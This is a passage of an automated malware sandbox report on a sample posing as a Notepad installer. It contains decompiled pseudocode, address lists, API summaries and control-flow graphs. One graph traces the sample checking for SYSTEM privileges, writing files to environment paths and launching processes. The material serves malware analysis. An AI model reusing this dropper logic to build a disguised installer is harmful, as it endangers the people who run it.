																					_t395 = _v80;
																					 *((char*)(_t352 + _t395)) = _v101 & 0x000000ff;
																					_t263 = _t352 + _t395 + 1;
																					goto L114;
																				}
																			}
																			goto L129;
																		}
																		L114:
																		_v96 = _t352;
																		_v116 = _t332 + 1;
																		_v120 = _t379;
																		_t381 = _t406;
																		 *_t406 = _t263;
																		memcpy(??, ??, ??);
																		 *_t406 = _v96;
																		_t273 = E00408390(strlen(??) + 0x10 >> 4 << 4);
																		_t393 = _v92;
																		_t407 = _t406 - _t273;
																		_t274 =  &_v112;
																		_v96 = _t274;
																		_t354 = _t274;
																		while(1) {
																			L116:
																			_t275 =  *_t393 & 0x000000ff;
																			_t334 =  &(_t393[1]);
																			if(_t275 == 0x7f) {
																				break;
																			}
																			_t354 = _t354 + 1;
																			_t393 = _t334;
																			 *(_t354 - 1) = _t275;
																			__eflags = _t275;
																			if(_t275 != 0) {
																				continue;
																			}
																			L118:
																			_t276 = _v96;
																			 *_t407 = _t276;
																			L00408484();
																			_t408 = _t381;
																			_t394 = _t276;
																			if(_t276 == 0) {
																				_v48 = 3;
																			} else {
																				_v48 = _v48 & (0 | _v48 == 0x00000002) - 0x00000001;
																				if((_v52 & 0x00000040) == 0) {
																					_t384 = _v84;
																					__eflags = _t384;
																					if(_t384 == 0) {
																						 *_t408 = 0xc;
																						_t280 = malloc(??);
																						_v84 = _t280;
																						__eflags = _t280;
																						if(_t280 != 0) {
																							_t281 = _v84;
																							 *((intOrPtr*)(_t281 + 8)) = _t394;
																							 *(_t281 + 4) = 0;
																							 *_t281 = 0;
																						}
																					} else {
																						_v92 = _t320;
																						_t321 = _v52 & 0x00004000;
																						while(1) {
																							_t284 =  *(_t384 + 8);
																							 *_t408 = _t394;
																							_v120 = _t284;
																							__eflags = _t321;
																							if(_t321 != 0) {
																								_t284 = strcoll();
																							} else {
																								L0040A418();
																							}
																							_t335 =  *_t384;
																							_t355 =  *(_t384 + 4);
																							__eflags = _t284;
																							if(_t284 <= 0) {
																								_t355 = _t335;
																							}
																							__eflags = _t355;
																							if(_t355 == 0) {
																								break;
																							}
																							_t384 = _t355;
																						}
																						_t320 = _v92;
																						_v92 = _t284;
																						 *_t408 = 0xc;
																						_t285 = malloc(??);
																						_t356 = _v92;
																						__eflags = _t285;
																						if(_t285 != 0) {
																							 *((intOrPtr*)(_t285 + 8)) = _t394;
																							 *(_t285 + 4) = 0;
																							 *_t285 = 0;
																							__eflags = _t356;
																							if(_t356 <= 0) {
																								 *_t384 = _t285;
																							} else {
																								 *(_t384 + 4) = _t285;
																							}
																						}
																					}
																				} else {
																					if(_a4 != 0) {
																						E00408C90(_t394, _a4);
																					}
																				}
																			}
																			_t402 = _v88;
																			goto L109;
																		}
																		_t288 = _t393[1] & 0x000000ff;
																		_t354 = _t354 + 1;
																		_t393 =  &(_t393[2]);
																		 *(_t354 - 1) = _t288;
																		if(_t288 != 0) {
																			goto L116;
																		}
																		goto L118;
																	}
																} else {
																	continue;
																}
																goto L129;
															}
															 *_t402 = _v56;
															E00409FB0();
															__eflags = _v84;
															if(_v84 != 0) {
																E00408CF0(_v84, _a4);
															}
														}
													}
													goto L103;
													L103:
													_t239 =  *_t320;
													_t320 =  &(_t320[1]);
													 *_t402 = _t239;
													E00408660();
													_t236 =  *_t320;
													__eflags = _t236;
												} while (_t236 != 0);
												L130:
												_t377 = _v36;
											}
										}
									}
								}
								L129:
								 *_t402 = _t377;
								E00408660();
								L52:
								return _v48;
							}
						}
					}
				}
				L159:
			}


























































































































                                      0x00408d99
                                      0x00408d9c
                                      0x00408d9f
                                      0x00408da5
                                      0x00408ee8
                                      0x00408eeb
                                      0x00408eed
                                      0x00408efe
                                      0x00408f03
                                      0x00408f06
                                      0x00408f06
                                      0x00408f08
                                      0x00408f0c
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f12
                                      0x00408f15
                                      0x00000000
                                      0x00000000
                                      0x00408f17
                                      0x00408f17
                                      0x00408f1a
                                      0x00408f60
                                      0x00408f64
                                      0x00408f66
                                      0x00408f69
                                      0x00408f6c
                                      0x00408f6c
                                      0x00408f6f
                                      0x00408f74
                                      0x00408f76
                                      0x00408f7d
                                      0x00408f7f
                                      0x00408fac
                                      0x00408fac
                                      0x00408fb0
                                      0x00408fb3
                                      0x00408fa5
                                      0x00408fa5
                                      0x00408fa5
                                      0x00408fa8
                                      0x00408faa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f88
                                      0x00408fc0
                                      0x00408fc2
                                      0x004090e0
                                      0x004090e2
                                      0x00000000
                                      0x004090e8
                                      0x004090e8
                                      0x004090ec
                                      0x004090ee
                                      0x00000000
                                      0x004090f4
                                      0x004090f4
                                      0x004090f7
                                      0x004090fb
                                      0x004090fb
                                      0x004090ee
                                      0x00000000
                                      0x00408fc8
                                      0x00408fc8
                                      0x00408fc8
                                      0x00408fcb
                                      0x00000000
                                      0x00408fcd
                                      0x00408fcd
                                      0x00408fd1
                                      0x00408fd4
                                      0x00408fd7
                                      0x00000000
                                      0x00408fdd
                                      0x00408fdd
                                      0x00408fe0
                                      0x00408fe3
                                      0x00408fe3
                                      0x00408fe3
                                      0x00408fe6
                                      0x00408feb
                                      0x00408fee
                                      0x00000000
                                      0x00000000
                                      0x00408ff8
                                      0x00408ff8
                                      0x00408ff8
                                      0x00408ffb
                                      0x00408ffd
                                      0x00408ffd
                                      0x00409000
                                      0x00409070
                                      0x00409070
                                      0x00409073
                                      0x00409140
                                      0x00000000
                                      0x00409079
                                      0x00409079
                                      0x0040907c
                                      0x00000000
                                      0x0040907c
                                      0x00000000
                                      0x00409002
                                      0x00409002
                                      0x00409005
                                      0x004090c0
                                      0x004090c0
                                      0x004090c3
                                      0x004090c6
                                      0x004090d0
                                      0x004090d2
                                      0x004090d4
                                      0x00000000
                                      0x004090d6
                                      0x00000000
                                      0x004090d6
                                      0x004090c8
                                      0x004090c8
                                      0x004090cb
                                      0x0040907f
                                      0x0040907f
                                      0x00409083
                                      0x00409086
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409086
                                      0x00000000
                                      0x0040900b
                                      0x0040900b
                                      0x0040900e
                                      0x00000000
                                      0x00409014
                                      0x00409014
                                      0x00409016
                                      0x00409020
                                      0x00409020
                                      0x00409023
                                      0x00409027
                                      0x0040902a
                                      0x00000000
                                      0x00000000
                                      0x0040902c
                                      0x00409120
                                      0x00409120
                                      0x00409123
                                      0x004091a0
                                      0x004091a3
                                      0x00409020
                                      0x00409023
                                      0x00409027
                                      0x0040902a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409125
                                      0x00409125
                                      0x00409128
                                      0x004091d0
                                      0x004091d0
                                      0x004091d3
                                      0x00409142
                                      0x00409142
                                      0x00409142
                                      0x00409148
                                      0x00409148
                                      0x0040914b
                                      0x0040914e
                                      0x00409151
                                      0x00409154
                                      0x00409154
                                      0x0040915b
                                      0x0040915d
                                      0x00409160
                                      0x00409169
                                      0x0040916e
                                      0x00409171
                                      0x0040910c
                                      0x0040910c
                                      0x00000000
                                      0x00409173
                                      0x00409173
                                      0x00409176
                                      0x0040940e
                                      0x00000000
                                      0x0040917c
                                      0x0040917c
                                      0x00000000
                                      0x0040917c
                                      0x00409176
                                      0x004091d9
                                      0x004091d9
                                      0x00409020
                                      0x00409020
                                      0x00409023
                                      0x00409027
                                      0x0040902a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040902a
                                      0x00409020
                                      0x0040912e
                                      0x0040912e
                                      0x00409130
                                      0x0040904e
                                      0x0040904e
                                      0x00409051
                                      0x00000000
                                      0x00409136
                                      0x00409136
                                      0x00409020
                                      0x00409020
                                      0x00409023
                                      0x00409027
                                      0x0040902a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409048
                                      0x00409048
                                      0x00409048
                                      0x0040904c
                                      0x00000000
                                      0x00000000
                                      0x00409038
                                      0x0040903c
                                      0x0040903f
                                      0x00409042
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409042
                                      0x00000000
                                      0x00409048
                                      0x00409020
                                      0x00409130
                                      0x00409128
                                      0x00000000
                                      0x00409123
                                      0x00409020
                                      0x0040900e
                                      0x00409005
                                      0x00409058
                                      0x00000000
                                      0x0040908c
                                      0x0040908c
                                      0x00409090
                                      0x00409093
                                      0x00409096
                                      0x00409099
                                      0x0040909b
                                      0x00409108
                                      0x00000000
                                      0x0040909d
                                      0x0040909d
                                      0x004090a1
                                      0x00000000
                                      0x004090a1
                                      0x00000000
                                      0x0040909b
                                      0x00408fe3
                                      0x00408fd7
                                      0x00408fcb
                                      0x00408f8a
                                      0x00408f8a
                                      0x00408f8c
                                      0x004090b0
                                      0x004090b3
                                      0x004090b3
                                      0x004090b6
                                      0x004090b8
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f0f
                                      0x00408f12
                                      0x00408f15
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f15
                                      0x00408f92
                                      0x00408f92
                                      0x00408f94
                                      0x00408f9f
                                      0x00408f9f
                                      0x00408fa3
                                      0x00408fa3
                                      0x00408f96
                                      0x00408f96
                                      0x00408f99
                                      0x004091b0
                                      0x004091b4
                                      0x004091bb
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f99
                                      0x00000000
                                      0x00408f94
                                      0x00408f8c
                                      0x00408f1c
                                      0x00408f1c
                                      0x00408f1c
                                      0x00408f1e
                                      0x00408f21
                                      0x00408f23
                                      0x004091c2
                                      0x00000000
                                      0x00408f29
                                      0x00408f29
                                      0x00408f2d
                                      0x00408f2f
                                      0x00408f31
                                      0x00408f31
                                      0x00408f34
                                      0x00408f37
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00408f37
                                      0x00408f23
                                      0x00000000
                                      0x00408f39
                                      0x00408f39
                                      0x00408f3d
                                      0x00408f40
                                      0x00408f42
                                      0x00408f50
                                      0x00408f53
                                      0x00408f56
                                      0x00408f59
                                      0x00000000
                                      0x00408f44
                                      0x00408f44
                                      0x00408f47
                                      0x00408f4a
                                      0x00408f4c
                                      0x00000000
                                      0x00408f4c
                                      0x00000000
                                      0x00408f42
                                      0x00408dab
                                      0x00408dab
                                      0x00408dab
                                      0x00408dae
                                      0x00408db1
                                      0x00408db9
                                      0x00408dca
                                      0x00408dd0
                                      0x00408dd4
                                      0x00408dd8
                                      0x00408de0
                                      0x00408de3
                                      0x00408de8
                                      0x00408def
                                      0x00408df2
                                      0x00408df7
                                      0x00408dfc
                                      0x00408e01
                                      0x00409188
                                      0x00409195
                                      0x00408e07
                                      0x00408e09
                                      0x00408e1d
                                      0x00408e20
                                      0x00408e22
                                      0x00408e38
                                      0x00408e3a
                                      0x00408e3c
                                      0x00408e40
                                      0x00408e54
                                      0x00408e54
                                      0x00408e54
                                      0x00408e57
                                      0x00408e5c
                                      0x00000000
                                      0x00000000
                                      0x00408e48
                                      0x00408e4b
                                      0x00408e4d
                                      0x00408e50
                                      0x00408e52
                                      0x00000000
                                      0x00000000
                                      0x00408e6f
                                      0x00408e6f
                                      0x00408e72
                                      0x00408e77
                                      0x00408e7e
                                      0x00408e82
                                      0x00000000
                                      0x00408e88
                                      0x00408e90
                                      0x00000000
                                      0x00408e90
                                      0x00000000
                                      0x00408e82
                                      0x00408e5e
                                      0x00408e62
                                      0x00408e65
                                      0x00408e68
                                      0x00408e6d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409416
                                      0x0040941c
                                      0x0040942d
                                      0x00408e93
                                      0x00408e98
                                      0x00000000
                                      0x00408e9e
                                      0x00408ea1
                                      0x00408ea7
                                      0x004091e0
                                      0x004091e3
                                      0x004091e6
                                      0x004091eb
                                      0x004091ee
                                      0x004091f1
                                      0x004091f4
                                      0x004091f7
                                      0x004091f9
                                      0x00409212
                                      0x00409212
                                      0x00409214
                                      0x00000000
                                      0x00409216
                                      0x00409216
                                      0x00409218
                                      0x00000000
                                      0x0040921a
                                      0x0040921a
                                      0x0040921a
                                      0x00409218
                                      0x00409200
                                      0x00409200
                                      0x00409200
                                      0x00409202
                                      0x00000000
                                      0x00000000
                                      0x00409204
                                      0x00409206
                                      0x00000000
                                      0x00409208
                                      0x00409208
                                      0x0040920b
                                      0x0040920e
                                      0x00409210
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00409210
                                      0x00000000
                                      0x00409206
                                      0x00409220
                                      0x00409220
                                      0x00409220
                                      0x00409220
                                      0x00409223
                                      0x00409225
                                      0x00409228
                                      0x00409228
                                      0x0040922c
                                      0x0040922c
                                      0x00409230
                                      0x00409230
                                      0x00000000
                                      0x00408eb5
                                      0x00408eb5
                                      0x00408ebb
                                      0x00000000
                                      0x00408ecb
                                      0x00408ecf
                                      0x00409584
                                      0x0040958c
                                      0x00409591
                                      0x00409594
                                      0x00409596
                                      0x004095a0
                                      0x004095a3
                                      0x004095b8
                                      0x004095ba
                                      0x004095bc
                                      0x004095c0
                                      0x004095d4
                                      0x004095d4
                                      0x004095d7
                                      0x004095d7
                                      0x004095da
                                      0x004095dc
                                      0x004095c4
                                      0x004095de
                                      0x004095de
                                      0x004095e2
                                      0x004095e2
                                      0x004095c6
                                      0x004095c9
                                      0x004095cc
                                      0x004095cc
                                      0x0040945b
                                      0x0040945e
                                      0x00409463
                                      0x00409465
                                      0x00409467
                                      0x00000000
                                      0x00409469
                                      0x0040946c
                                      0x0040946e
                                      0x00000000
                                      0x00409470
                                      0x00409473
                                      0x0040947b
                                      0x0040947b
                                      0x0040946e
                                      0x00409598
                                      0x00409598
                                      0x00000000
                                      0x00409598
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed5
                                      0x00408ed9
                                      0x00409233
                                      0x00409233
                                      0x00409236
                                      0x0040923d
                                      0x00409241
                                      0x0040924a
                                      0x0040924d
                                      0x00409255
                                      0x004092a6
                                      0x004092aa
                                      0x00409288
                                      0x00409288
                                      0x004092ac
                                      0x004092ac
                                      0x004092af
                                      0x004092b4
                                      0x004092b9
                                      0x00409260
                                      0x00409264
                                      0x00000000
                                      0x00409266
                                      0x00409266
                                      0x00409269
                                      0x0040926b
                                      0x0040926d
                                      0x00409274
                                      0x0040927a
                                      0x0040927d
                                      0x0040927f
                                      0x00409281
                                      0x00000000
                                      0x00000000
                                      0x00409281
                                      0x0040926b
                                      0x004092bb
                                      0x004092be
                                      0x004092c7
                                      0x004092cb
                                      0x004092d3
                                      0x004092d3
                                      0x004092d9
                                      0x004092e3
                                      0x004092f0
                                      0x004092f0
                                      0x004092f3
                                      0x004092f6
                                      0x004092fb
                                      0x004092ff
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409312
                                      0x00409312
                                      0x00409324
                                      0x00000000
                                      0x00409326
                                      0x00409326
                                      0x0040932d
                                      0x00409342
                                      0x00409344
                                      0x00409348
                                      0x0040934b
                                      0x0040934f
                                      0x00409494
                                      0x00409499
                                      0x0040949c
                                      0x0040949f
                                      0x004094a3
                                      0x004094a7
                                      0x004094aa
                                      0x004094af
                                      0x004094b4
                                      0x004094b7
                                      0x004094ba
                                      0x004094bc
                                      0x00409573
                                      0x00409576
                                      0x00000000
                                      0x004094c2
                                      0x004094c2
                                      0x004094c4
                                      0x00000000
                                      0x004094ca
                                      0x004094ca
                                      0x004094d1
                                      0x004094d4
                                      0x00000000
                                      0x004094d4
                                      0x004094c4
                                      0x00000000
                                      0x004094bc
                                      0x00409355
                                      0x00409358
                                      0x0040935b
                                      0x0040935f
                                      0x00409363
                                      0x00409365
                                      0x00409368
                                      0x00409370
                                      0x00409381
                                      0x00409386
                                      0x00409389
                                      0x0040938b
                                      0x0040938f
                                      0x00409392
                                      0x004093ac
                                      0x004093ac
                                      0x004093ac
                                      0x004093af
                                      0x004093b4
                                      0x00000000
                                      0x00000000
                                      0x004093a0
                                      0x004093a3
                                      0x004093a5
                                      0x004093a8
                                      0x004093aa
                                      0x00000000
                                      0x00000000
                                      0x004093c7
                                      0x004093c7
                                      0x004093ca
                                      0x004093cd
                                      0x004093d2
                                      0x004093d4
                                      0x004093d8
                                      0x00409616
                                      0x004093de
                                      0x004093ee
                                      0x004093f5
                                      0x004094dd
                                      0x004094e0
                                      0x004094e2
                                      0x004095e7
                                      0x004095ee
                                      0x004095f3
                                      0x004095f6
                                      0x004095f8
                                      0x004095fe
                                      0x00409601
                                      0x00409604
                                      0x0040960b
                                      0x0040960b
                                      0x004094e8
                                      0x004094eb
                                      0x004094f3
                                      0x00409516
                                      0x00409516
                                      0x00409519
                                      0x0040951c
                                      0x00409520
                                      0x00409522
                                      0x00409500
                                      0x00409524
                                      0x00409524
                                      0x00409524
                                      0x00409505
                                      0x00409507
                                      0x0040950a
                                      0x0040950c
                                      0x0040950e
                                      0x0040950e
                                      0x00409510
                                      0x00409512
                                      0x00000000
                                      0x00000000
                                      0x00409514
                                      0x00409514
                                      0x0040952b
                                      0x0040952e
                                      0x00409531
                                      0x00409538
                                      0x0040953d
                                      0x00409540
                                      0x00409542
                                      0x00409548
                                      0x0040954b
                                      0x00409552
                                      0x00409558
                                      0x0040955a
                                      0x0040957d
                                      0x0040955c
                                      0x0040955c
                                      0x0040955c
                                      0x0040955a
                                      0x00409542
                                      0x004093fb
                                      0x00409400
                                      0x00409569
                                      0x00409569
                                      0x00409400
                                      0x004093f5
                                      0x00409406
                                      0x00000000
                                      0x00409406
                                      0x004093b6
                                      0x004093ba
                                      0x004093bd
                                      0x004093c0
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004093c5
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040930a
                                      0x00409438
                                      0x0040943b
                                      0x00409443
                                      0x00409445
                                      0x00409451
                                      0x00409451
                                      0x00409445
                                      0x004092b9
                                      0x00000000
                                      0x0040928f
                                      0x0040928f
                                      0x00409291
                                      0x00409294
                                      0x00409297
                                      0x0040929c
                                      0x0040929e
                                      0x0040929e
                                      0x0040948d
                                      0x00409490
                                      0x00409490
                                      0x00409241
                                      0x00408ecf
                                      0x00408ebb
                                      0x0040947d
                                      0x0040947d
                                      0x00409480
                                      0x0040905b
                                      0x00409065
                                      0x00409065
                                      0x00408e98
                                      0x00408e09
                                      0x00408e01
                                      0x00000000

                                      APIs
                                      • strlen.MSVCRT ref: 00408DB4
                                      • memcpy.MSVCRT ref: 00408DDB
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 004097A8
                                        • Part of subcall function 00409790: _strdup.MSVCRT ref: 004097B6
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 004097CC
                                        • Part of subcall function 00409790: wcstombs.MSVCRT ref: 004097F7
                                        • Part of subcall function 00409790: wcstombs.MSVCRT ref: 00409824
                                        • Part of subcall function 00409790: setlocale.MSVCRT ref: 00409834
                                        • Part of subcall function 00408D40: malloc.MSVCRT ref: 00408D57
                                      • strlen.MSVCRT ref: 00408E25
                                      • _strdup.MSVCRT ref: 00408E72
                                      • strlen.MSVCRT ref: 00408EF0
                                      • strlen.MSVCRT ref: 004092CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: strlen$setlocale$_strdupwcstombs$mallocmemcpy
                                      • String ID: @$\${
                                      • API String ID: 3109254050-3793226235
                                      • Opcode ID: d94793a96d8ef9b7f1c3237bf5d260d39e48d9d5f13d987d82fa3dae0cb6d214
                                      • Instruction ID: 7abe499393f3cf874450ccc27ba7372533db9edf66c7a69db6a133c8b261ef6e
                                      • Opcode Fuzzy Hash: d94793a96d8ef9b7f1c3237bf5d260d39e48d9d5f13d987d82fa3dae0cb6d214
                                      • Instruction Fuzzy Hash: 4A32A071D082558BDB10DF69C4402AEBBB2AF45304F18857FD895BB382DB39AC46CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006E2CDA Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 220stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 6e2cda-6e2d3b VirtualFree memset time srand calloc 400 6e2dfb 398->400 401 6e2d41-6e2d65 call 6e64be strlen call 6e8013 398->401 403 6e2dfe-6e2e0a 400->403 413 6e2de6-6e2df9 call 6e64d1 ??3@YAXPAX@Z 401->413 414 6e2d67-6e2de3 call 6ef51e call 6ef885 call 6ef8f0 call 6ef5ba 401->414 405 6e2e0c-6e2e14 403->405 406 6e2e17-6e2e22 ??3@YAXPAX@Z 403->406 405->406 408 6e3598-6e359c 406->408 409 6e2e28-6e2e40 GetCurrentProcess OpenProcessToken 406->409 411 6e2e9d-6e2ea4 call 6e359d 409->411 412 6e2e42-6e2e75 memset call 6e415d 409->412 425 6e2eaa-6e2ebc call 6e35f2 411->425 426 6e2f98-6e2fb1 call 6ec89b call 6e403a 411->426 423 6e2e77-6e2e8b lstrcmpiW 412->423 424 6e2e94-6e2e97 CloseHandle 412->424 413->403 414->413 423->424 430 6e2e8d 423->430 424->411 434 6e358e-6e3597 ??3@YAXPAX@Z 425->434 435 6e2ec2-6e2ed5 calloc 425->435 426->434 444 6e2fb7-6e2fd9 call 6e64be call 6e2975 426->444 430->424 434->408 435->434 438 6e2edb-6e2f6a memcpy * 3 strlen 435->438 441 6e2f6c 438->441 442 6e2f70-6e2f93 ??3@YAXPAX@Z 438->442 441->442 450 6e358d 442->450 452 6e2fdf-6e3002 call 6e3f27 CreateFileMappingW 444->452 453 6e357a-6e358c call 6e64d1 ??3@YAXPAX@Z 444->453 450->434 458 6e356a GetLastError 452->458 459 6e3008-6e3023 call 6e6512 MapViewOfFile 452->459 453->450 460 6e3570-6e3579 ??3@YAXPAX@Z 458->460 463 6e3559 GetLastError 459->463 464 6e3029-6e309f strlen memcpy * 3 strcpy 459->464 460->453 465 6e355f-6e3568 CloseHandle 463->465 466 6e30a5-6e316d UnmapViewOfFile call 6e5c88 * 8 lstrcpyW call 6e651b * 2 464->466 467 6e30a1 464->467 465->460 466->465 488 6e3173-6e31bb call 6e651b call 6e57d5 call 6e2975 466->488 467->466 488->465 495 6e31c1-6e31eb call 6e651b * 2 488->495 500 6e3381-6e33b3 GetTickCount _snwprintf ExpandEnvironmentStringsW 495->500 501 6e31f1-6e3223 GetTickCount _snwprintf ExpandEnvironmentStringsW 495->501 502 6e354d-6e3557 ??3@YAXPAX@Z 500->502 504 6e33b9-6e33d3 CreateFileW 500->504 501->502 503 6e3229-6e3243 CreateFileW 501->503 502->465 503->502 506 6e3249-6e3270 WriteFile CloseHandle 503->506 504->502 505 6e33d9-6e3400 WriteFile FindCloseChangeNotification 504->505 505->502 507 6e3406-6e3409 505->507 506->502 508 6e3276-6e3279 506->508 507->502 509 6e340f-6e3440 _snwprintf call 6e3d9d 507->509 508->502 510 6e327f-6e32b0 _snwprintf call 6e3d9d 508->510 509->502 516 6e3446-6e345f GetModuleHandleA 509->516 510->502 515 6e32b6-6e32cf GetModuleHandleA 510->515 517 6e32de-6e32e4 515->517 518 6e32d1-6e32d9 GetProcAddress 515->518 519 6e346e-6e3474 516->519 520 6e3461-6e3469 GetProcAddress 516->520 521 6e32e6-6e32ee GetProcAddress 517->521 522 6e32f3-6e32fa 517->522 518->517 523 6e3476-6e347e GetProcAddress 519->523 524 6e3483-6e348a 519->524 520->519 521->522 525 6e32fc-6e32ff 522->525 526 6e3302-6e3317 ExpandEnvironmentStringsW 522->526 523->524 527 6e348c-6e348f 524->527 528 6e3492-6e34a8 ExpandEnvironmentStringsW 524->528 525->526 529 6e336c-6e3373 526->529 530 6e3319-6e334c GetStartupInfoW CreateProcessW 526->530 527->528 531 6e34ae-6e34b1 528->531 532 6e353f-6e3546 528->532 529->502 534 6e3379-6e337c 529->534 530->529 533 6e334e-6e336a WaitForSingleObject CloseHandle * 2 530->533 535 6e34ee-6e351f GetStartupInfoW CreateProcessW 531->535 536 6e34b3-6e34c6 CoInitialize call 6e3f5f 531->536 532->502 537 6e3548 532->537 533->529 539 6e354b 534->539 535->532 538 6e3521-6e353d WaitForSingleObject CloseHandle * 2 535->538 542 6e34cf call 6e6f32 536->542 543 6e34c8-6e34cd call 6e6977 536->543 537->539 538->532 539->502 547 6e34d4-6e34d9 542->547 543->547 548 6e34db-6e34e0 Sleep 547->548 549 6e34e6-6e34ec 547->549 548->549 549->532
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ??3@$memcpystrlen$Processcallocmemset$CloseCurrentFreeHandleOpenTokenVirtuallstrcmpisrandtime
                                      • String ID: SYSTEM
                                      • API String ID: 3425465250-968218125
                                      • Opcode ID: 0a5a699f310945c0ba7151edf3f05612b4bfeddb60dce53af764b146ab9fa3d4
                                      • Instruction ID: d0b8d50f48c6db4b7d80cc49f6bebf240cf04ce866aaaa4e7d6fa6f57ecbff9b
                                      • Opcode Fuzzy Hash: 0a5a699f310945c0ba7151edf3f05612b4bfeddb60dce53af764b146ab9fa3d4
                                      • Instruction Fuzzy Hash: 7D812BB1901359AFDB50DFA5DC89ADEBBFAFB08304F10456AE549E7250DB30A944CF20
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402609 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 225memorylibrarystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 551 402609-40261f 552 402625-402647 HeapAlloc 551->552 553 40286e-402878 551->553 552->553 554 40264d-40267d call 40240c 552->554 557 402683-40271b LoadLibraryW 554->557 558 402854-40286b HeapFree 554->558 557->558 559 402721-40272d 557->559 558->553 560 402733-402737 559->560 561 402845-402851 FreeLibrary 559->561 560->561 562 40273d-402755 560->562 561->558 562->561 563 40275b-40278e 562->563 564 4027c5-4027ea strlen call 402446 563->564 567 4027a9-4027b5 564->567 568 4027ec 564->568 569 4027b9-4027c3 567->569 570 402790-402795 568->570 571 4027ee-4027f3 568->571 569->564 573 402820-40282e 569->573 570->569 572 402797-4027a7 570->572 574 4027f5-4027fa 571->574 575 40280e-40281e 571->575 572->569 573->561 576 402830-402835 573->576 574->569 577 4027fc-40280c 574->577 575->569 576->561 578 402837-40283c 576->578 577->569 578->561 579 40283e-402843 578->579 579->561 580 402879-402901 call 4022f1 call 40237f 579->580 580->561 586 402907-402955 580->586 588 40295b-4029ae 586->588 589 4029ed-4029f6 call 408660 586->589 590 4029b4-4029b6 588->590 589->561 590->589 592 4029b8-4029bb 590->592 592->589 593 4029bd-4029e8 call 401d91 592->593 593->589
                                      APIs
                                      • HeapAlloc.KERNEL32 ref: 0040263B
                                      • LoadLibraryW.KERNEL32 ref: 0040270D
                                      • strlen.MSVCRT ref: 004027CC
                                      • FreeLibrary.KERNEL32 ref: 0040284C
                                      • HeapFree.KERNEL32 ref: 00402866
                                        • Part of subcall function 0040240C: TlsAlloc.KERNEL32 ref: 00402414
                                        • Part of subcall function 0040240C: TlsSetValue.KERNEL32 ref: 00402424
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: AllocFreeHeapLibrary$LoadValuestrlen
                                      • String ID: .$MemF$Rust Analyzer 02$a$b$c$d$e$i$l$l$n$t
                                      • API String ID: 2201604028-3158050648
                                      • Opcode ID: 3bdcccb426339d1b263f279166384a14830091d0bb5e60991591b28352ae3406
